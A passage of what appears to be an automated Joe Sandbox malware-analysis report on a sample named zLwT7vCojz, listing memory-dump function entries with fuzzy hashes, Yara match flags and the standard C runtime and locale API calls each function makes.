                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C911A172380104AFE744DF55DCC5FA673EAEB88364B198065ED04CB716E675E812C760
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                                              • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                              • Instruction ID: 405ad84ec7ab6f843ddc86f4517bc1886342da18c4368a51d964f369b22871f7
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 61012B766116108FDF25CF20CA04BAA33F5FB85305F0544B4E606D7281E370B845CB80
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                                              • Opcode ID: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                              • Instruction ID: be0c7f41622c0834781820e5c80c0c4c42947f0d62a81a89eccdb0a5eabaeaa5
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f1cc673af9145743846b530fb17d4bb0f149097f4a5cdf7631a5188ec6ee8c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AEB19D71900305AFEB21DFB9C880BEFBBF5BF08305F1450A9E995A7251DB36B9458B60
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$Info
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 2509303402-0
                                                                                                                                                                                                                                              • Opcode ID: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                              • Instruction ID: f64e8217d5a59399788f44db3acace11ca7a1a82a17f4f1e7e4f503dd26c9166
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9ba8043ac8ff267f0ce42ea0bddbd3aca1e886c3a33d2db2d31a05c5540ee44f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68B1CF71900305AFDB20DFA5C881BEEBBF5BF48304F14416EF959E7242D7B9A8918B64
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0433F8FC
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC68
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC7A
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC8C
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433EC9E
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECB0
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECC2
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECD4
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECE6
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ECF8
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED0A
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED1C
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED2E
                                                                                                                                                                                                                                                • Part of subcall function 0433EC4B: _free.LIBCMT ref: 0433ED40
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F8F1
                                                                                                                                                                                                                                                • Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
                                                                                                                                                                                                                                                • Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F913
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F928
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F933
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F955
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F968
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F976
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F981
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F9B9
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F9C0
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F9DD
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0433F9F5
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                              • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                              • Instruction ID: fd6b2c76ee768f96f3cd1c5c341bab536b5a8988150fda4bf3fe33e653f3fdb8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 82318D31A00705BFFB31AA79D845B5AB7E9EF0031EF50642AE499D7190DF3AF9818B11
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • ___free_lconv_mon.LIBCMT ref: 0041F695
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA01
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA13
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA25
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA37
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA49
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA5B
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA6D
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA7F
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EA91
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAA3
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAB5
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAC7
                                                                                                                                                                                                                                                • Part of subcall function 0041E9E4: _free.LIBCMT ref: 0041EAD9
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F68A
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F6AC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F6C1
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F6CC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F6EE
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F701
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F70F
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F71A
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F752
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F759
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F776
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0041F78E
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 161543041-0
                                                                                                                                                                                                                                              • Opcode ID: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                              • Instruction ID: c0d36dfa6e7f1bd62f92c80ef49453a98ce7ec3addb1216f5c788df5de5df6c1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4378ab1e63d5d9fa38ce44ce9ca5439023feb45242475f2f3e48cd459ec3a37b
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 68314A316007049FEB20AA3AE845BD773E8FB44318F15446FE859D72A1DB38FCC68A18
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 269201875-0
                                                                                                                                                                                                                                              • Opcode ID: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                              • Instruction ID: 07e65b0fe858109c33bb0f60f82280ccd5dee523497fe62cc235ec4013c6f493
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d1f1aa2d03a28af46cbd75311468763efbf7631b30b7f566802b3458c1c144c6
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9EC15575E40304ABDB20DBA9CC46FDE77F8EB48704F14416AFE05EB282D674AD818798
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0042435F), ref: 00423379
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: DecodePointer
                                                                                                                                                                                                                                              • String ID: _CB$acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                              • API String ID: 3527080286-940912563
                                                                                                                                                                                                                                              • Opcode ID: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                              • Instruction ID: 5368ad48e2641d38b699083c4314cf7ba7867baba3e9f2aa5664b85b9913fc9a
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d3f8b26fe42f63356626bb489b4f8eb5208b9729511c62bda581acb0adce4f8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52518970A00229DBCF10DFA9F9481ADBBB0FB09305FE4419BE481A6254CB7D9B65CB1D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EA0
                                                                                                                                                                                                                                                • Part of subcall function 04336501: HeapFree.KERNEL32(00000000,00000000,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?), ref: 04336517
                                                                                                                                                                                                                                                • Part of subcall function 04336501: GetLastError.KERNEL32(?,?,0433F3B8,?,00000000,?,00000000,?,0433F65C,?,00000007,?,?,0433FA50,?,?), ref: 04336529
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EAC
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EB7
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EC2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336ECD
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336ED8
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EE3
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EEE
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336EF9
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 04336F07
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                              • Instruction ID: 461ec1459796bf5d582af0edcdcdd03a619bbb33600cc307031c86bc8e2d8f55
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A11E376100408BFEB21EF94C842CDD3FA5EF14359B0194A1FA088F224DA36FA509F81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C39
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?), ref: 004162B0
                                                                                                                                                                                                                                                • Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F151,?,00000000,?,00000000,?,0041F3F5,?,00000007,?,?,0041F7E9,?,?), ref: 004162C2
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C45
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C50
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C5B
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C66
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C71
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C7C
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C87
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416C92
                                                                                                                                                                                                                                              • _free.LIBCMT ref: 00416CA0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 776569668-0
                                                                                                                                                                                                                                              • Opcode ID: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                              • Instruction ID: 425b14d8582b8484cae793816d5f4fa8e3af98928aded5048720e3a5ca7bcabf
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 8f320bdab7b5661ed1c853ef06dc04aedb299049eced393b2d7ed1c319db58c9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B311E976100218BFDF01FF95D952DD93B65EF48358B4280AAFD088F222DA35EE919B84
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 004011B5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 004011C7
                                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00401204
                                                                                                                                                                                                                                                • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407E99
                                                                                                                                                                                                                                                • Part of subcall function 00407E7A: _Yarn.LIBCPMT ref: 00407EBD
                                                                                                                                                                                                                                              • std::bad_exception::bad_exception.LIBCMT ref: 00401225
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00401233
                                                                                                                                                                                                                                              • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00401256
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 004012C7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1555897451.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1555897451.000000000043E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Locinfo::_LockitYarn$Exception@8H_prologLocinfo_ctorLocinfo_dtorLockit::_Lockit::~_Throwstd::bad_exception::bad_exception
                                                                                                                                                                                                                                              • String ID: bad locale name
                                                                                                                                                                                                                                              • API String ID: 835844855-1405518554
                                                                                                                                                                                                                                              • Opcode ID: 55177262ea2afd16f9533dae2115e5600a8f627848f4ff0f88f433b0e8276529
                                                                                                                                                                                                                                              • Instruction ID: 963657a0c5d8f337c123b09bbff0c4169cb5784efefba0bb6704a6d5c2622931
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55177262ea2afd16f9533dae2115e5600a8f627848f4ff0f88f433b0e8276529
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5E319F31905B40DEC7319F6AD941A5BFBF0BF48714B508A7FE04AA3AA1C738A504CB5D
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 043243F5
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04324404
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0432441B
                                                                                                                                                                                                                                                • Part of subcall function 0432157F: std::_Lockit::_Lockit.LIBCPMT ref: 04321590
                                                                                                                                                                                                                                                • Part of subcall function 0432157F: std::_Lockit::~_Lockit.LIBCPMT ref: 043215AA
                                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 04324424
                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 04324455
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 0432446B
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 04324491
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                              • String ID: {wB
                                                                                                                                                                                                                                              • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                              • Opcode ID: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                              • Instruction ID: 4566b6b43a131aa91136d7c73eba72ff0a7b78b1645c66865895e426ba595002
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6a15cd81147e8b7007d3cd02608cb2e387321e1c26f20b036f43f035c357c9b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: A31127329005349BDB05EBA4DE00AEE7B75FF94718F20111AE801B3290DB34BA01CBA0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 04323656
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04323665
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 0432367C
                                                                                                                                                                                                                                                • Part of subcall function 0432157F: std::_Lockit::_Lockit.LIBCPMT ref: 04321590
                                                                                                                                                                                                                                                • Part of subcall function 0432157F: std::_Lockit::~_Lockit.LIBCPMT ref: 043215AA
                                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 04323685
                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 043236B6
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 043236CC
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 043236F2
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                              • String ID: {wB
                                                                                                                                                                                                                                              • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                              • Opcode ID: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                              • Instruction ID: 1a3f1d1ad09e8f96fdd713a2e783f7703b4b958cc9fb95aa3c3f37af67f3ad55
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1eabbb2a9b2771c9de4863127b7bcde072d27fb26debdc912d863437d7ea98c8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AB11E3729002399BEB05EBA4CA44AEEBB79FF84724F14141AE811B7290DB74AA00C7D0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __EH_prolog.LIBCMT ref: 04323861
                                                                                                                                                                                                                                              • std::_Lockit::_Lockit.LIBCPMT ref: 04323870
                                                                                                                                                                                                                                              • int.LIBCPMT ref: 04323887
                                                                                                                                                                                                                                                • Part of subcall function 0432157F: std::_Lockit::_Lockit.LIBCPMT ref: 04321590
                                                                                                                                                                                                                                                • Part of subcall function 0432157F: std::_Lockit::~_Lockit.LIBCPMT ref: 043215AA
                                                                                                                                                                                                                                              • std::locale::_Getfacet.LIBCPMT ref: 04323890
                                                                                                                                                                                                                                              • std::_Facet_Register.LIBCPMT ref: 043238C1
                                                                                                                                                                                                                                              • std::_Lockit::~_Lockit.LIBCPMT ref: 043238D7
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 043238FD
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1558244577.0000000004320000.00000040.00001000.00020000.00000000.sdmp, Offset: 04320000, based on PE: false
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_4320000_zLwT7vCojz.jbxd
                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
                                                                                                                                                                                                                                              • String ID: {wB
                                                                                                                                                                                                                                              • API String ID: 1202896665-1598656814
                                                                                                                                                                                                                                              • Opcode ID: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                              • Instruction ID: 04817db925fd75b1fe1ede7c40d3ee5128b5068ebf28bc3cee45b8a97cfd3bd6
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 44e1379c924fe0f37ea9cef57713a614ee3e6891814545b44dd0cbbb4a3af186
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E611E372E001389BDB15EBB4CA44AEEBB75FF84714F14142AE811B7290DB74AA04CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Memory Dump Source
